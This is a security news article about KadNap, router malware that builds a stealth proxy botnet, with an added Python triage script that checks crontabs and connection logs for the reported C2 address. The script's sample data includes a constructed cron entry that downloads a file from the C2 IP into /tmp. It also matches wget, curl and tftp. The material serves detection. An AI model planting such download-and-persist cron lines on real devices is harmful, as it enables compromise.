thehackernews.com 3/10/2026, 4:30:08 PM

KadNap Malware Infects 14,000+ Edge Devices to Power Stealth Proxy Botnet

KadNap is a newly identified malware that has infected more than 14,000 edge devices, with the majority of victims located in the United States, according to Black Lotus Labs at Lumen. Although it primarily targets Asus routers, researchers say the operators have deployed KadNap against a range of edge networking devices.

The malware uses a custom Kademlia Distributed Hash Table (DHT) to conceal its infrastructure within a peer-to-peer network, making it harder to detect or disrupt. Compromised devices are recruited into a proxy botnet service called Doppelgänger, which also markets resident proxies in over 50 countries. A shell script downloaded from the C2 server (212.104.141[.]140) establishes persistence by creating a cron job, renaming components, and loading an ELF file to deploy KadNap on devices with ARM and MIPS processors.

The operation also retrieves C2 IP addresses, closes SSH port 22, and stores host time data to help locate other peers. According to the report, KadNap’s use of the DHT network aims to conceal communications and hinder takedowns.
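A triage sketch for the two host-visible traces described above, cron persistence and traffic to the listed C2 address. This is an added example, not code from the report or from Black Lotus Labs; the function names, the flow-record format and all sample lines are assumptions constructed for illustration.

```python
import ipaddress
import re

# C2 address exactly as printed (defanged) in the article above.
C2_IP = ipaddress.ip_address("212.104.141[.]140".replace("[.]", "."))
IPV4_RE = re.compile(r"(?<![\d.])\d{1,3}(?:\.\d{1,3}){3}(?![\d.])")
FETCH_RE = re.compile(r"\b(?:wget|curl|tftp)\b")

def parse_ip(text):
    """Return an ip_address object, or None if text is not a valid IP."""
    try:
        return ipaddress.ip_address(text)
    except ValueError:
        return None

def triage_crontab(crontab_text):
    """Flag cron entries that name the C2 or download from any raw IP."""
    findings = []
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        ips = {parse_ip(m) for m in IPV4_RE.findall(entry)} - {None}
        if C2_IP in ips:
            findings.append((lineno, "c2-reference"))
        elif ips and FETCH_RE.search(entry):
            findings.append((lineno, "fetch-from-raw-ip"))
    return findings

def hosts_contacting_c2(conn_lines):
    """Assumed record format: '<epoch> <src_ip> <dst_ip> <dst_port>'."""
    hosts = set()
    for line in conn_lines:
        fields = line.split()
        if len(fields) == 4 and parse_ip(fields[2]) == C2_IP:
            hosts.add(fields[1])
    return sorted(hosts)

# Constructed sample data (not taken from a real device or from the report).
SAMPLE_CRONTAB = """\
# root crontab
0 3 * * * /usr/sbin/ntpclient -s
55 * * * * wget -q http://212.104.141.140/PLACEHOLDER -O /tmp/PLACEHOLDER
*/30 * * * * curl -s http://198.51.100.7/update -o /tmp/update
"""
SAMPLE_CONNS = [
    "1773160208 192.168.1.1 212.104.141.140 80",
    "1773160209 192.168.1.23 203.0.113.9 443",
    "not a flow record",
]
```

A clean result from this check does not clear a device: the article says components are renamed, and peers located through the DHT will not match a single fixed address.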

Article by CyberSIXT